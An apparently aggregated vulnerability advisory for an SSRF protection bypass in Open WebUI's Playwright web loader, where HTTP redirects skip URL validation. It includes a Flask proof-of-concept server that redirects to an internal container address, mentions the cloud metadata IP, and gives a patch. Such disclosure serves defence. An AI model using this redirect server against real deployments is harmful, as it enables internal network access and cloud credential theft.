🛡️ CVE-2026-54018 — open-webui

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-918 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Open WebUI: SSRF Protection Bypass in Playwright Web Loader via HTTP Redirects

Summary

The SafePlaywrightURLLoader implements a validate_url function to prevent SSRF attacks by checking the IP address of the user-provided URL. However, this validation is performed only on the initial URL.

Since Playwright automatically follows HTTP redirects (301/302) by default, an attacker can bypass the validation by providing a safe URL that redirects to a restricted internal network address (e.g., localhost, Docker container network, or Cloud Metadata).

This allows the application to access internal services despite ENABLE_RAG_LOCAL_WEB_FETCH being set to False

Details

Root Cause

The application validates the initial user-provided URL using self._safe_process_url_sync(url). This correctly resolves the domain and ensures it does not point to a private IP.

The application then calls page.goto(url). By default, Playwright automatically follows HTTP redirects (301/302).

The Bypass: If the destination server returns a redirect to an internal IP (e.g., 127.0.0.1 or 169.254.169.254), the browser follows it without re-validating the new destination. The initial validation is bypassed because it only checked the first URL, not the entire redirect chain.

```python

for url in self.urls:

try:

self._safe_process_url_sync(url)

page = browser.new_page()

response = page.goto(url, timeout=self.playwright_timeout) #this

if response is None:

raise ValueError(...)

text = self.evaluator.evaluate(page, browser, response)

```

PoC

(This PoC uses Docker to easily demonstrate internal network access (accessing a container by service name). However, the vulnerability is NOT tied to Docker.)

1. Ensure the Open WebUI is configured with the following environment variables. The vulnerability is specific to the Playwright engine.

2. ENABLE_RAG_LOCAL_WEB_FETCH=False (Default)

3. RAG_WEB_LOADER_ENGINE=playwright

4. Setup and run attack server

5. In Open WebUI, use the "Web Search" or "URL Loader" feature.

6. Input the attacker's URL (e.g., http://attacker-ip/).

```python

# attack_server.py

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')

def attack():

# Redirect to the Open WebUI container's internal port

return redirect("http://open-webui:8080/api/version", code=302)

if __name__ == '__main__':

app.run(host='0.0.0.0', port=80)

```

<img width="580" height="192" alt="image" src="https://github.com/user-attachments/assets/4600dbb5-a81d-4e58-b787-afe04fe59d6e" />

The Playwright browser follows the redirect to the internal address (http://open-webui:8080/api/version)

Impact

+ Cloud Environments: Access to Instance Metadata Service (IMDS) to steal cloud credentials.

+ Intranet/On-Premise: Scanning internal networks and accessing unauthenticated internal tools.

+ Container Environments: Accessing other containers within the same network.

Recommended Patch

implement a request interceptor using Playwright's page.route. This ensures all requests, including redirects, are validated before connection.

apply the following logic to both lazy_load and alazy_load methods:

```python

# async context

async def intercept_route(route):

try:

await run_in_threadpool(validate_url, route.request.url)

await route.continue_()

except Exception:

await route.abort()

await page.route("**/*", intercept_route)

response = await page.goto(url, timeout=self.playwright_timeout)

```

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality high, integrity none, availability none.

Weakness class

CVE-2026-54018 is classified as CWE-918: Server-Side Request Forgery (SSRF). The server fetches a URL supplied by the caller, which can be pointed at internal systems it alone can reach.

Affected software

CVE-2026-54018 is recorded against 1 package.

  • open-webui (fixed in 0.9.6)

Timeline and source

Published on 17 June 2026 and last revised on 20 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Advisory)
github.com (Package)
github.com (Web)
pypi.org (Web)

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
CWE CWE-918
Public Exploit ⚠️ Yes
Source OSV
Published 2026-06-17
Updated 2026-08-12
Modified 2026-07-20
Fix URL N/A

Affected Packages

Software From version Fixed in
open-webui 0.9.6

Similar Threats

Exploit Protection

Are you running open-webui?

CVE-2026-54018 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-54018 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.